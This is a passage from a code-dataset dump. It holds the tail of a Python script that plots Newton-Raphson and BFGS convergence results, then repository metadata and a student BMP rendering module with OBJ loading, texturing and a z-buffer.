.19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Pure NR, x=.19')\nsavefig('pure_nr_x19')\n\nax.clear()\nax.scatter(moded_nr_x19[:,0], moded_nr_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR, x=.19')\nsavefig('moded_nr_x19')\n\nax.clear()\nax.scatter( moded_nr_wls_x19[:,0], moded_nr_wls_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with Line Search, 
x=.19')\nsavefig('moded_nr_wls_x19')\n\nax.clear()\nax.scatter(moded_nr_bfgs_x19[:,0], moded_nr_bfgs_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with BFGS, x=.19')\nsavefig('moded_nr_bfgs_x19')\n\nax.clear()\nax.scatter( moded_nr_bfgs_wls_x19[:,0], moded_nr_bfgs_wls_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified BR with BFGS and Line Search, x=.19')\nsavefig('moded_nr_bfgs_wls_x19')\n\n\npure_nr_x30 = np.loadtxt(\"pure_nr_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_x30 = np.loadtxt(\"moded_nr_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_wls_x30 = np.loadtxt(\"moded_nr_wls_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_x30 = np.loadtxt(\"moded_nr_bfgs_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_wls_x30 = np.loadtxt(\"moded_nr_bfgs_wls_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\n\nheader = [\"pure d\", \"pure N\",\"modified d\", \"modified N\",\"modified wls d\", \"modified wls N\",\"BFGS d\", \"BFGS N\",\"BFGS wls d\", \"BFGS wls N\"]\ncontent = np.array([pure_nr_x30[:,0], pure_nr_x30[:,1], moded_nr_x30[:,0], moded_nr_x30[:,1], moded_nr_wls_x30[:,0], moded_nr_wls_x30[:,1], moded_nr_bfgs_x30[:,0], moded_nr_bfgs_x30[:,1], moded_nr_bfgs_wls_x30[:,0], moded_nr_bfgs_wls_x30[:,1]], ndmin=2)\nprint \"\\\\begin{figure}\"\nprint tabulate(content.transpose(), header, tablefmt=\"latex\")\nprint \"\\\\caption{Solution approximations, $x=.30$}\"\nprint \"\\\\end{figure}\"\n\nax.clear()\nax.scatter(pure_nr_x30[:,0], pure_nr_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Pure NR, x=.30')\nsavefig('pure_nr_x30')\n\nax.clear()\nax.scatter(moded_nr_x30[:,0], moded_nr_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR, x=.30')\nsavefig('moded_nr_x30')\n\nax.clear()\nax.scatter( moded_nr_wls_x30[:,0], moded_nr_wls_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with Line Search, x=.30')\nsavefig('moded_nr_wls_x30')\n\nax.clear()\nax.scatter(moded_nr_bfgs_x30[:,0], moded_nr_bfgs_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with BFGS, x=.30')\nsavefig('moded_nr_bfgs_x30')\n\nax.clear()\nax.scatter( moded_nr_bfgs_wls_x30[:,0], moded_nr_bfgs_wls_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified BR with BFGS and Line Search, x=.30')\nsavefig('moded_nr_bfgs_wls_x30')\n\nax.clear()\npure_nr_x19_conv = np.loadtxt(\"pure_nr_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_x19_conv = np.loadtxt(\"moded_nr_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_wls_x19_conv = np.loadtxt(\"moded_nr_wls_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_x19_conv = np.loadtxt(\"moded_nr_bfgs_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_wls_x19_conv = np.loadtxt(\"moded_nr_bfgs_wls_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\n\nheader = [\"pure\",\"modified\",\"modified wls\",\"BFGS\",\"BFGS 
wls\"]\ncontent = np.ndarray(shape =(40,5))\ncontent[:,0] = pure_nr_x19_conv\ncontent[:,1] = moded_nr_x19_conv\ncontent[:,2] = moded_nr_wls_x19_conv\ncontent[:,3] = moded_nr_bfgs_x19_conv\ncontent[:,4] = moded_nr_bfgs_wls_x19_conv\n\nprint \"\\\\begin{figure}\"\nprint tabulate(content, header, tablefmt=\"latex\")\nprint \"\\\\caption{Number of iterations, $x=.19$}\"\nprint \"\\\\end{figure}\"\n\nax.clear()\nax.scatter( range(1,len(pure_nr_x19_conv)+1), pure_nr_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Pure NR, x=.19')\nsavefig('pure_nr_x19_conv')\n\nax.clear()\nax.scatter(range(1,len(moded_nr_x19_conv)+1) ,moded_nr_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR, x=.19')\nsavefig('moded_nr_x19_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_wls_x19_conv)+1), moded_nr_wls_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with Line Search, x=.19')\nsavefig('moded_nr_wls_x19_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_x19_conv)+1), moded_nr_bfgs_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with BFGS, x=.19')\nsavefig('moded_nr_bfgs_x19_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_wls_x19_conv)+1), moded_nr_bfgs_wls_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified BR with BFGS and Line Search, x=.19')\nsavefig('moded_nr_bfgs_wls_x19_conv')\n\n\npure_nr_x30_conv = np.loadtxt(\"pure_nr_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_x30_conv = np.loadtxt(\"moded_nr_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_wls_x30_conv = np.loadtxt(\"moded_nr_wls_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_x30_conv = np.loadtxt(\"moded_nr_bfgs_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_wls_x30_conv = np.loadtxt(\"moded_nr_bfgs_wls_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\n\nheader = [\"pure\",\"modified\",\"modified wls\",\"BFGS\",\"BFGS wls\"]\ncontent = np.ndarray(shape =(40,5))\ncontent[:,0] = pure_nr_x30_conv\ncontent[:,1] = moded_nr_x30_conv\ncontent[:,2] = moded_nr_wls_x30_conv\ncontent[:,3] = moded_nr_bfgs_x30_conv\ncontent[:,4] = moded_nr_bfgs_wls_x30_conv\n\nprint \"\\\\begin{figure}\"\nprint tabulate(content, header, tablefmt=\"latex\")\nprint \"\\\\caption{Number of iterations, $x=.30$}\"\nprint \"\\\\end{figure}\"\n\nax.clear()\nax.scatter( range(1,len(pure_nr_x30_conv)+1), pure_nr_x30_conv )\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Pure NR, x=.30')\nsavefig('pure_nr_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_x30_conv)+1), moded_nr_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR, x=.30')\nsavefig('moded_nr_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_wls_x30_conv)+1), moded_nr_wls_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with Line Search, x=.30')\nsavefig('moded_nr_wls_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_x30_conv)+1), moded_nr_bfgs_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with BFGS, x=.30')\nsavefig('moded_nr_bfgs_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_wls_x30_conv)+1), moded_nr_bfgs_wls_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num 
Iterations')\nax.set_title('Modified NR with BFGS and Line Search, x=.30')\nsavefig('moded_nr_bfgs_wls_x30_conv')\n\nax.clear()\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Exact N1 vs d1, x=.19')\nsavefig('exact_x19')\n\nax.clear()\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Exact N1 vs d1, x=.30')\nsavefig('exact_x30')\n" } ]
2
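The convergence study above drives matplotlib through the same clear/scatter/plot/label/save block once per solver variant and load case. A helper like the sketch below collapses each repetition into a single call; the helper name and the exact-curve parameter are ours, while the file layout (comma-separated d1/N1 pairs with one header row) matches what the script reads with np.loadtxt. Python 3 syntax is used here, unlike the Python 2 prints in the original.

import numpy as np
import matplotlib.pyplot as plt

def plot_solution(ax, fname, title, d_max, exact):
    # Load the saved (d1, N1) iterates: comma-separated, one header row,
    # exactly as the solver output files above are read.
    pts = np.loadtxt(fname + ".txt", delimiter=",", skiprows=1, ndmin=2)
    d = np.linspace(0.0, d_max, 100)
    ax.clear()
    ax.scatter(pts[:, 0], pts[:, 1])   # solver iterates
    ax.plot(d, exact(d))               # exact N1(d1) curve
    ax.set_xlabel('d1')
    ax.set_ylabel('N1')
    ax.set_title(title)
    plt.savefig(fname)

# Usage, with N_explicit taken from the original script:
# fig, ax = plt.subplots()
# plot_solution(ax, 'pure_nr_x30', 'Pure NR, x=.30', 4.5,
#               lambda d: N_explicit(d, .30))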
LuisDiego19FV/Graficas-SR6
https://github.com/LuisDiego19FV/Graficas-SR6
515280cfb732ea66ecfc46a34b4623f31161448d
60d03755d8457216ba3306c3158aed4025f319df
e49075615eae2639f5f468e2f5ab9db1e8c36def
refs/heads/master
2020-05-02T01:30:53.455147
2019-03-26T00:52:41
2019-03-26T00:52:41
177,687,389
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6151432991027832, "alphanum_fraction": 0.6343932747840881, "avg_line_length": 24.22661781311035, "blob_id": "193043da01f00dcbc4c2052bef1b62854b54e39c", "content_id": "b5aee9933d8beff7ace7b770b200e0826e15b156", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14026, "license_type": "no_license", "max_line_length": 146, "num_lines": 556, "path": "/bmp_processor.py", "repo_name": "LuisDiego19FV/Graficas-SR6", "src_encoding": "UTF-8", "text": "#bmp_processor\n#Por Luis Diego Fernandez\n#V_A\nimport sys\nimport math\nimport struct\nimport random\nimport numpy as np\n\nclass bmpImage:\n\n\t# Define init(). Attributes Initializer\n\tdef __init__(self, new_width, new_height):\n\t\t# image data\n\t\tself.image_data = bytes()\n\n\t\t# image attributes\n\t\tself.width = 0\n\t\tself.height = 0\n\t\tself.bits_per_pixel = 0\n\t\tself.row_bytes = 0\n\t\tself.row_padding = 0\n\n\t\t# viewport\n\t\tself.vp_x = 0\n\t\tself.vp_y = 0\n\t\tself.vp_width = 0\n\t\tself.vp_height = 0\n\n\t\t# clear colors\n\t\tself.clearRgbRed = 0\n\t\tself.clearRgbGreen = 0\n\t\tself.clearRgbBlue = 0\n\n\t\t# paint colors\n\t\tself.paintRgbRed = 0\n\t\tself.paintRgbGreen = 0\n\t\tself.paintRgbBlue = 0\n\n\t\t# texture image\n\t\tself.textureImg = []\n\t\tself.texture_width = 0\n\t\tself.texture_height = 0\n\t\tself.texture_width_ratio = 0\n\t\tself.texture_height_ratio = 0\n\n\t\t# add values\n\t\tself.constructImage(new_width, new_height)\n\n\t# Define constructImage(int, int). Creates the header for the BMP image\n\t# returns: 0 on success\n\tdef constructImage(self, new_width, new_height):\n\n\t\tself.width = new_width\n\t\tself.height = new_height\n\t\tself.row_bytes = new_width * 4\n\t\tself.row_padding = int(math.ceil(int(self.row_bytes / 4.0))) * 4 - self.row_bytes\n\n\t\tdata = bytes('BM', 'utf-8')\n\t\tdata += struct.pack('i', 26 + 4 * self.width * self.height)\n\t\tdata += struct.pack('h', 0)\n\t\tdata += struct.pack('h', 0)\n\t\tdata += struct.pack('i', 26)\n\t\tdata += struct.pack('i', 12)\n\t\tdata += struct.pack('h', self.width)\n\t\tdata += struct.pack('h', self.height)\n\t\tdata += struct.pack('h', 1)\n\t\tdata += struct.pack('h', 32)\n\n\t\tself.image_data = data\n\n\t\tself.z_buffer = [\n\t [-float('inf') for x in range(self.width)]\n\t\t for y in range(self.height)\n\t ]\n\n\t\treturn 0\n\n\t# Define glAbsolutePointPaint(int, int). Paints an individual pixel\n\t# returns: 0 on success\n\tdef glAbsolutePoint(self,x, y):\n\n\t\t# changes the data of an individual pixel\n\t\tdata = self.image_data[:26 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4]\n\t\tdata += self.rgbToByte(self.paintRgbRed, self.paintRgbGreen, self.paintRgbBlue)\n\t\tdata += self.image_data[30 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4:]\n\n\t\tself.image_data = data\n\n\t\treturn 0\n\n\t# Define glAbsolutePointPaint(int, int). Paints an individual pixel\n\t# returns: 0 on success\n\tdef glAbsolutePointWithColor(self,x, y,color):\n\n\t\t# changes the data of an individual pixel\n\t\tdata = self.image_data[:26 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4]\n\t\tdata += color\n\t\tdata += self.image_data[30 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4:]\n\n\t\tself.image_data = data\n\n\t\treturn 0\n\n\t# Define glLine(). 
Paints a line from point (xi,yi) to (xf,yf)\n\t# returns: 0 on success\n\tdef glAbsoluteLine(self,xi,yi,xf,yf):\n\n\t\tdy = yf - yi\n\t\tdx = xf - xi\n\n\t\tif (dx == 0):\n\t\t\tfor y in range(dy + 1):\n\t\t\t\tself.glAbsolutePoint(xi,y + yi)\n\n\t\t\treturn 0\n\n\t\tm = dy/dx\n\t\tgrad = m <= 1 and m >= 0\n\n\t\tif grad and xi > xf:\n\t\t\txi, xf = xf, xi\n\t\t\tyi, yf = yf, yi\n\t\t\tdy = yf - yi\n\t\t\tdx = xf - xi\n\t\t\tm = dy/dx\n\t\t\tgrad = m <= 1 and m >= 0\n\n\t\telif yi > yf:\n\t\t\txi, xf = xf, xi\n\t\t\tyi, yf = yf, yi\n\t\t\tdy = yf - yi\n\t\t\tdx = xf - xi\n\t\t\tm = dy/dx\n\t\t\tgrad = m <= 1 and m >= 0\n\n\t\tif (grad):\n\t\t\tfor x in range(dx + 1):\n\t\t\t\ty = round(m*x + yi)\n\t\t\t\tself.glAbsolutePoint(x+xi,y)\n\t\telse:\n\t\t\tm = 1/m\n\t\t\tfor y in range(dy + 1):\n\t\t\t\tx = round(m*y + xi)\n\t\t\t\tself.glAbsolutePoint(x,y + yi)\n\n\t\treturn 0\n\n\t# Define glClear(). It paints the whole image in a specific rgb color.\n\t# returns: 0 on success\n\tdef glClear(self):\n\n\t\tfirst = True\n\t\tpixel = self.rgbToByte(self.clearRgbRed, self.clearRgbGreen, self.clearRgbBlue)\n\n\t\tfor y in range(self.height):\n\n\t\t\tif (first):\n\t\t\t\tdata = pixel * self.width\n\t\t\t\tfirst = False\n\t\t\telse:\n\t\t\t\tdata += pixel * self.width\n\n\t\t\t# padding for each line\n\t\t\tfor x in range(self.row_padding):\n\t\t\t\tdata += bytes('\\x00', 'utf-8')\n\n\t\tself.image_data = self.image_data[:27] + data\n\n\t\treturn 0\n\n\t#Define glClearColor(float, float, float). It change the colors used for the glClear\n\t# returns: 0 on success\n\tdef glClearColor(self,r,g,b):\n\n\t\t# the rgb data for glClear is store after converting the rgb numbers from float to integers\n\t\t# on a scale from 0 to 255\n\t\tself.clearRgbRed = int(math.ceil(float(r/1)*255))\n\t\tself.clearRgbGreen = int(math.ceil(float(g/1)*255))\n\t\tself.clearRgbBlue = int(math.ceil(float(b/1)*255))\n\n\t\treturn 0\n\n\n\t# Define glColor(float, float, float). 
It change the colors used for painting a specific pixel\n\t# returns: 0 on success\n\tdef glColor(self,r,g,b):\n\n\t\t# the rgb data for the pixel painting is store after converting the rgb numbers from float\n\t\t# to integers on a scale from 0 to 255\n\t\tself.paintRgbRed = int(math.ceil(float(r/1)*255))\n\t\tself.paintRgbGreen = int(math.ceil(float(g/1)*255))\n\t\tself.paintRgbBlue = int(math.ceil(float(b/1)*255))\n\n\t\treturn 0\n\n\tdef glLoadTextureImage(self, texture, scale_X, scale_Y):\n\t\timage = open(texture + '.bmp', \"rb\")\n\n\t\timage.seek(10)\n\t\theader_size = struct.unpack(\"=l\", image.read(4))[0]\n\t\timage.seek(18)\n\n\t\tself.texture_width = struct.unpack(\"=l\", image.read(4))[0]\n\t\tself.texture_height = struct.unpack(\"=l\", image.read(4))[0]\n\t\tself.texture_width_ratio = (self.texture_width/self.width)/scale_X\n\t\tself.texture_height_ratio = (self.texture_height/self.height)/scale_Y\n\t\tself.textureImg = []\n\t\timage.seek(header_size)\n\t\tfor y in range(self.texture_height):\n\t\t\tself.textureImg.append([])\n\t\t\tfor x in range(self.texture_width):\n\t\t\t\tb = ord(image.read(1))\n\t\t\t\tg = ord(image.read(1))\n\t\t\t\tr = ord(image.read(1))\n\t\t\t\tself.textureImg[y].append(self.rgbToByte(r,g,b))\n\n\t\timage.close()\n\n\t\treturn 0\n\n\tdef glObjMover(self, vertices, scale, translateX, translateY):\n\n\t\tnew_vertices = []\n\n\t\t# transform np\n\t\tscale_it = np.matrix([\n\t\t [scale,0,0],\n\t\t [0,scale,0],\n\t\t [0,0,1]\n\t\t])\n\n\t\tfor vertice in vertices:\n\t\t\tvertice = np.matmul(scale_it,vertice)\n\t\t\tvertice = np.sum([vertice,[translateX,translateY,0]],axis=0)\n\n\t\t\tnew_vertices.append([vertice.item(0),vertice.item(1),vertice.item(2)])\n\n\t\treturn new_vertices\n\n\tdef glObjRotate(self,vertices,angle):\n\n\t\tnew_vertices = []\n\n\t\t# transform np\n\t\trotate_it = np.matrix([\n\t\t [np.cos(angle), -np.sin(angle), 0],\n\t\t [np.sin(angle), np.cos(angle), 0],\n\t\t [0.01, 0.001, 1]\n\t\t])\n\n\t\tfor vertice in vertices:\n\n\t\t\tvertice = np.matmul(rotate_it,vertice)\n\t\t\tnew_vertices.append([vertice.item(0),vertice.item(1),vertice.item(2)])\n\n\t\treturn new_vertices\n\n\n\tdef glObjReader(self, objectName):\n\n\t\t# opens obj file\n\t\tfile = open(objectName + '.obj')\n\t\tlines = file.read().splitlines()\n\n\t\t# vertices and faces\n\t\tvertices = []\n\t\ttextures = []\n\t\tfaces = []\n\n\t\t# reads each line and stores each vertice and face\n\t\tfor line in lines:\n\n\t\t\t# gets the prefix and the values of either a vertice or a face\n\t\t\ttry:\n\t\t\t\tprefix, value = line.split(' ',1)\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\n\t\t\t# reads and store vertices\n\t\t\tif prefix == 'v':\n\t\t\t\ttry:\n\t\t\t\t\tvertices.append(list(map(float, value.split(' '))))\n\t\t\t\texcept ValueError:\n\t\t\t\t\tbreak\n\n\t\t\t# reads and store vertices\n\t\t\tif prefix == 'vt':\n\t\t\t\ttry:\n\t\t\t\t\ttextures.append(list(map(float, value.split(' '))))\n\t\t\t\texcept ValueError:\n\t\t\t\t\tbreak\n\n\t\t\t# reads and store faces\n\t\t\telif prefix == 'f':\n\t\t\t\tsection = []\n\t\t\t\tfor face in value.split(' '):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsection.append(list(map(int, face.split('/'))))\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsection.append(list(map(int, face.split('//'))))\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tbreak\n\t\t\t\tfaces.append(section)\n\n\t\t# 2D list to return with the vertices and faces\n\t\tobject_skeleton = [vertices,faces,textures]\n\n\t\treturn object_skeleton\n\n\n\t# Define 
glObjWriter(). Makes BMP out of a flat .obj\n\t# Return 0 on success\n\tdef glObjWriter(self,object_skeleton,scale,translate_x, translate_y,angle = 0):\n\n\t\t# vertices and faces\n\t\tvertices = self.glObjMover(object_skeleton[0],1/scale,translate_x,translate_y)\n\t\tif angle != 0:\n\t\t\tvertices = self.glObjRotate(vertices,angle)\n\n\t\tfaces = object_skeleton[1]\n\t\ttextures = object_skeleton[2]\n\n\t\t# counter\n\t\tcounter = 0\n\n\t\t# draws each face of the object\n\t\tfor face in faces:\n\n\t\t\tcounter += 1\n\t\t\tif counter%50 == 0:\n\t\t\t\tsys.stdout.write('\\r' + str(counter/len(faces)*100)[0:4] + \"% complete\")\n\n\t\t\tpollygon = []\n\t\t\ttexturesToPaint = []\n\t\t\tz_avg = 0\n\t\t\tpaint_pol = True\n\n\t\t\t# gets all the vertices in a face\n\t\t\tfor i in range(len(face)):\n\t\t\t\tx = int((vertices[face[i][0]-1][0])*self.width)\n\t\t\t\ty = int((vertices[face[i][0]-1][1])*self.height)\n\t\t\t\tz = int(vertices[face[i][0]-1][2])\n\n\t\t\t\ttex_X = textures[face[i][1]-1][0]\n\t\t\t\ttex_Y = textures[face[i][1]-1][1]\n\n\t\t\t\tz_avg += z\n\n\t\t\t\ttexturesToPaint.append([tex_X,tex_Y])\n\t\t\t\tpollygon.append([x,y])\n\n\t\t\t\tif x >= self.width or y >= self.height:\n\t\t\t\t\tpaint_pol = False\n\n\t\t\t\tif x < 0 or y < 0:\n\t\t\t\t\tpaint_pol = False\n\n\t\t\t# avarage cooordinate\n\t\t\tz_avg = z_avg/len(face)\n\n\t\t\t# paints the face\n\t\t\tif paint_pol:\n\t\t\t\tself.glPolygonMaker(pollygon,texturesToPaint,z_avg)\n\n\t\tsys.stdout.write('\\r' + \"100% complete \")\n\n\t\treturn 0\n\n\t# Define glPolygonMaker(). Paints a figure given the vertices in a list.\n\t# returns: 0 on success\n\tdef glPolygonMaker(self, vertices, textures, z_coordinate):\n\n\t\t# lista para guardar los puntos de la figura\n\t\tfigurePoints = []\n\n\t\t# se reutiliza el codigo para hacer lineas solo que se guarda cada punto\n\t\t# que se pinta en figurePoints\n\t\tfor i in range(len(vertices)):\n\n\t\t\txi = vertices[i][0]\n\t\t\tyi = vertices[i][1]\n\n\t\t\tif i == len(vertices)-1:\n\t\t\t\txf = vertices[0][0]\n\t\t\t\tyf = vertices[0][1]\n\n\t\t\telse:\n\t\t\t\txf = vertices[i+1][0]\n\t\t\t\tyf = vertices[i+1][1]\n\n\t\t\tdy = yf - yi\n\t\t\tdx = xf - xi\n\n\t\t\tif (dx == 0):\n\t\t\t\tif dy > 0:\n\t\t\t\t\tfor y in range(dy + 1):\n\t\t\t\t\t\tfigurePoints.append([xi,y + yi])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[xi][y+yi]:\n\t\t\t\t\t\t\tself.z_buffer[xi][y+yi] = z_coordinate\n\t\t\t\telse:\n\t\t\t\t\tfor y in range(abs(dy) + 1):\n\t\t\t\t\t\tfigurePoints.append([xi,y + yf])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[xi][y+yf]:\n\t\t\t\t\t\t\tself.z_buffer[xi][y+yf] = z_coordinate\n\t\t\telse:\n\t\t\t\tm = dy/dx\n\t\t\t\tgrad = m <= 1 and m >= 0\n\n\t\t\t\tif grad and xi > xf:\n\t\t\t\t\txi, xf = xf, xi\n\t\t\t\t\tyi, yf = yf, yi\n\t\t\t\t\tdy = yf - yi\n\t\t\t\t\tdx = xf - xi\n\t\t\t\t\tm = dy/dx\n\t\t\t\t\tgrad = m <= 1 and m >= 0\n\n\t\t\t\telif yi > yf:\n\t\t\t\t\txi, xf = xf, xi\n\t\t\t\t\tyi, yf = yf, yi\n\t\t\t\t\tdy = yf - yi\n\t\t\t\t\tdx = xf - xi\n\t\t\t\t\tm = dy/dx\n\t\t\t\t\tgrad = m <= 1 and m >= 0\n\n\t\t\t\tif (grad):\n\t\t\t\t\tfor x in range(dx + 1):\n\t\t\t\t\t\ty = round(m*x + yi)\n\t\t\t\t\t\tfigurePoints.append([x+xi,y])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[x+xi][y]:\n\t\t\t\t\t\t\tself.z_buffer[x+xi][y] = z_coordinate\n\t\t\t\telse:\n\t\t\t\t\tm = 1/m\n\t\t\t\t\tfor y in range(dy + 1):\n\t\t\t\t\t\tx = round(m*y + xi)\n\t\t\t\t\t\tfigurePoints.append([x,y + yi])\n\t\t\t\t\t\tif z_coordinate >= 
self.z_buffer[x][y+yi]:\n\t\t\t\t\t\t\tself.z_buffer[x][y+yi] = z_coordinate\n\n\n\t\t# avoids processing the same point twice.\n\t\tavoidPoints = []\n\t\tcounter_for_tex_Y = 0\n\n\t\tfor point in figurePoints:\n\n\t\t\tif (int(textures[0][1]*self.texture_height)-1 + counter_for_tex_Y) > self.texture_height:\n\t\t\t\tcounter_for_tex_Y -= self.texture_height_ratio\n\n\t\t\tif point[1] not in avoidPoints:\n\n\t\t\t\t# finds which points are in the same y coordinate in the figure.\n\t\t\t\tpointsToPaint = []\n\t\t\t\tfor i in range(len(figurePoints)):\n\t\t\t\t\tif figurePoints[i][1] == point[1]:\n\t\t\t\t\t\tpointsToPaint.append(figurePoints[i][0])\n\n\n\t\t\t\t# order the points\n\t\t\t\tpointsToPaint.sort()\n\t\t\t\tpointsLen = len(pointsToPaint)\n\n\t\t\t\tcounter_for_tex_X = 0\n\n\t\t\t\tif pointsLen != 0:\n\t\t\t\t\tfor xToDraw in range(pointsToPaint[0],pointsToPaint[pointsLen-1]+1):\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[xToDraw][point[1]]:\n\n\t\t\t\t\t\t\tif (int(textures[0][1]*self.texture_width)-1 + counter_for_tex_X) > self.texture_width:\n\t\t\t\t\t\t\t\tcounter_for_tex_X -= self.texture_width_ratio\n\n\t\t\t\t\t\t\tself.glAbsolutePointWithColor(xToDraw,point[1], \\\n\t\t\t\t\t\t\tself.textureImg[int(textures[0][1]*self.texture_height + counter_for_tex_Y)-1][int(textures[0][0]*self.texture_width + counter_for_tex_X)])\n\t\t\t\t\t\t\tself.z_buffer[xToDraw][point[1]] = z_coordinate\n\t\t\t\t\t\tcounter_for_tex_X += self.texture_width_ratio\n\n\t\t\t\tavoidPoints.append(point[1])\n\n\t\t\tcounter_for_tex_Y += self.texture_height_ratio\n\n\t\treturn 0\n\n\t# Define glVertex(int, int). Paints an individual pixel\n\t# returns: 0 on success\n\tdef glVertex(self,x, y):\n\n\t\t# painting cordinates\n\t\tpcx = self.vp_x + x\n\t\tpcy = self.vp_y + y\n\n\t\t# changes the data of an individual pixel\n\t\tdata = self.image_data[:26 + ((pcy - 1) * (self.width + self.row_padding) + (pcx - 1)) * 4]\n\t\tdata += self.rgbToByte(self.paintRgbRed, self.paintRgbGreen, self.paintRgbBlue)\n\t\tdata += self.image_data[30 + ((pcy - 1) * (self.width + self.row_padding) + (pcx - 1)) * 4:]\n\n\t\tself.image_data = data\n\n\t\treturn 0\n\n\t# Define glColor(). Paint the whole viewport\n\t# returns: 0 on success\n\tdef glVertexPaintVp(self):\n\n\t\tfor y in range(self.vp_height):\n\t\t\tfor x in range(self.vp_width):\n\t\t\t\tself.glVertex(x,y)\n\n\t\treturn 0\n\n\t# Define glViewPort(int, int, int, int). Establish an area of work for the painting process\n\t# returns: 0 on success\n\tdef glViewPort(self, viewport_x, viewport_y, viewport_width, viewport_height):\n\n\t\tself.vp_x = viewport_x\n\t\tself.vp_y = viewport_y\n\t\tself.vp_width = viewport_width\n\t\tself.vp_height = viewport_height\n\n\t\treturn 0\n\n\t# Define rgbToByte(int, int, int). Converts RGB to bytes\n\t# returns: 4 bytes indicating the RGB of a pixel\n\tdef rgbToByte(self, r,g,b):\n\t\tdata = struct.pack('B', b)\n\t\tdata += struct.pack('B', g)\n\t\tdata += struct.pack('B', r)\n\t\tdata += struct.pack('B', 0)\n\n\t\treturn data\n\n\t# Define finish(). 
